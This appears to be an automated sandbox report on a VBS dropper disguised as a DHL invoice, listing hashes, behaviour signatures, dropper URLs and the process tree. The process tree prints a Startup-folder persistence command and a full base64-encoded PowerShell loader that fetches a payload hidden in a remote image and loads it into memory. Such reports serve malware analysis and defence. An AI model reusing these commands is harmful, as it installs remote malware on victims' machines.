Analysis

  • max time kernel
    53s
  • max time network
    53s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    11-12-2024 12:59

General

  • Target

    DHL__WB 1391078651 & Duty Invoice_pdf.vbs

  • Size

    151KB

  • MD5

    ff8212965e057afb4e0946517ec05f68

  • SHA1

    3d1e2b49c8d6c57e08bfbd00a83ca1404af9dca4

  • SHA256

    d17e5a5ff4aa847109dbd63cd69ffbb6d6dd85c6578c58da91b1656e6641b8c1

  • SHA512

    1581ebef93d2fcf133f7367552b725e3d67340b26c163878ee744a1fe7b263b74c6ae4112e12d63e73557cab3d569986a5a3cd2eeb06f1a3b6a6c14557ef1229

  • SSDEEP

    3072:qYf8nkleSrzLv/Iu6KjrCuvYf8nkleSrzLv/Iu6oYf8nkleSrzLv/Iu6c:qYf8nMZP/Iu6UYf8nMZP/Iu6oYf8nMZB

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

exe.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Drops startup file 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DHL__WB 1391078651 & Duty Invoice_pdf.vbs"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:2300
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\DHL__WB 1391078651 & Duty Invoice_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:3036
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 10
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2984
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\DHL__WB 1391078651
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2928
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $solitons = 'JG1pc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskYmFwdGlzaWFzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskbnVtYmxlcyA9ICRiYXB0aXNpYXMuRG93bmxvYWREYXRhKCRtaXNzKTskcmVwcm9jZXNzID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJG51bWJsZXMpOyRkcm9uaXNoID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRzdWJtYW5kaWJ1bGFycyA9ICc8PEJBU0U2NF9FTkQ+Pic7JGdyYXZlc3RvbmUgPSAkcmVwcm9jZXNzLkluZGV4T2YoJGRyb25pc2gpOyRzdG9wcGxlID0gJHJlcHJvY2Vzcy5JbmRleE9mKCRzdWJtYW5kaWJ1bGFycyk7JGdyYXZlc3RvbmUgLWdlIDAgLWFuZCAkc3RvcHBsZSAtZ3QgJGdyYXZlc3RvbmU7JGdyYXZlc3RvbmUgKz0gJGRyb25pc2guTGVuZ3RoOyRsb2xsb3BzID0gJHN0b3BwbGUgLSAkZ3JhdmVzdG9uZTskcHJlY2FuY2VycyA9ICRyZXByb2Nlc3MuU3Vic3RyaW5nKCRncmF2ZXN0b25lLCAkbG9sbG9wcyk7JGNhdWRhbCA9IC1qb2luICgkcHJlY2FuY2Vycy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkcHJlY2FuY2Vycy5MZW5ndGgpXTskZ3JhemVkID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY2F1ZGFsKTskcGFybGF5ZWQgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRncmF6ZWQpOyRiYWNrc2xpZGVzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGJhY2tzbGlkZXMuSW52b2tlKCRudWxsLCBAKCcwL3RFbkluL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckbGFzcycsICckbGFzcycsICckbGFzcycsICdBZGRJblByb2Nlc3MzMicsICckbGFzcycsICckbGFzcycsJyRsYXNzJywnJGxhc3MnLCckbGFzcycsJyRsYXNzJywnJGxhc3MnLCcxJywnJGxhc3MnKSk7';$endbrain = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($solitons));Invoke-Expression $endbrain
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2036

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\CabFF09.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\TarFF1C.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    7214998edf268dd6c91cce155e5ce280

    SHA1

    bf2f1faf9996363a8ce1bd1bd6b7710831a1fc41

    SHA256

    a5f9499a79ad1cb0d42ed32f9bb1e2bff7620441e0ce094f95f39cca7cc30700

    SHA512

    12ec85071db8bf319ebdbfc6402bb344463f7cdc40a17394a9d652c50c55cf3037010a29d104d2cd1cdf24a28ea0648f55c94ebce66c3bdddec8651e412e1470

  • memory/2036-55-0x000000001AEF0000-0x000000001B048000-memory.dmp

    Filesize

    1.3MB

  • memory/2036-19-0x0000000002670000-0x0000000002678000-memory.dmp

    Filesize

    32KB

  • memory/2036-18-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

    Filesize

    2.9MB

  • memory/2928-8-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2928-12-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2928-11-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2928-9-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2928-10-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2928-5-0x000007FEF5AFE000-0x000007FEF5AFF000-memory.dmp

    Filesize

    4KB

  • memory/2928-7-0x0000000002870000-0x0000000002878000-memory.dmp

    Filesize

    32KB

  • memory/2928-6-0x000000001B750000-0x000000001BA32000-memory.dmp

    Filesize

    2.9MB